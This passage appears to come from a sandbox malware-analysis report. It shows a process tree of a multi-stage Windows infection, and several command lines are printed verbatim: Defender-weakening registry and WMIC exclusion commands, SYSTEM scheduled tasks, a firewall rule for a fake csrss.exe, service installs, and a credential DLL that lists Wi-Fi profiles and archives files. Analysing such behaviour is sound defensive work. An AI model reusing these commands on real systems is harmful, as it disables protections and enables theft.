        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:5856
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:5708
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:4684
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5992
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:4756
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4432
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6140
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS49B6.tmp\Install.exe\" it /qYXdidTxeY 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4412
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5984
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:3144
    - - C:\Users\Admin\Pictures\uaPPbtFaQvKdv3MMiftmiDPe.exe
        
        "C:\Users\Admin\Pictures\uaPPbtFaQvKdv3MMiftmiDPe.exe"
        5⤵
        Executes dropped EXE
        
        PID:2384
      - C:\Users\Admin\AppData\Local\Temp\7zS5AEC.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:1164
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:1408
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:5364
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:5244
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5920
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:6116
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:764
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5AEC.tmp\Install.exe\" it /klPdidweOF 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:6096
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5256
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:2004
- - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4760
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:5084
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3428
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:2404
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\106386276412_Desktop.zip' -CompressionLevel Optimal
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3224
- - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1880
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4168
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:5156
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:3552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 504
      4⤵
      Program crash
      PID:3724
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:4828
- - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:5848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      PID:5996
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:6044
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:6060
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:6080
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:6092
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:6108
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:6128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:4052
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:752
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:3956
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:5052
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:5048
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:2680
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:5140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:5272
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:5316
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:5332
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:5420
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:5424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
    "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
    3⤵
    - Executes dropped EXE
    PID:4116
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
      "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
      4⤵
      Executes dropped EXE
      PID:5536
    - - C:\Users\Admin\AppData\Local\Temp\u49s.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u49s.0.exe"
        5⤵
        
        PID:1728
    - - C:\Users\Admin\AppData\Local\Temp\u49s.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u49s.1.exe"
        5⤵
        
        PID:5308
  - - C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
      4⤵
      Executes dropped EXE
      PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
      "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
      4⤵
      Executes dropped EXE
      PID:1792
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6072
    - - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        5⤵
        
        PID:5876
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5596
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:1316
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:4724
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5208
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4560
- - C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe
    "C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe"
    3⤵
    - Executes dropped EXE
    PID:1984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      PID:6040
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
        
        work.exe -priverdD
        5⤵
        Executes dropped EXE
        
        PID:3428
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:4508

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4164

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2404

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4548
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5128
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5424
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5408
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:484
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:5976
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6124
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:2448

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5180
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5204
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5320
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5868
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5580
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4596
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:5600
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5448
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:6000

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5396
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5344
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5968
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5784
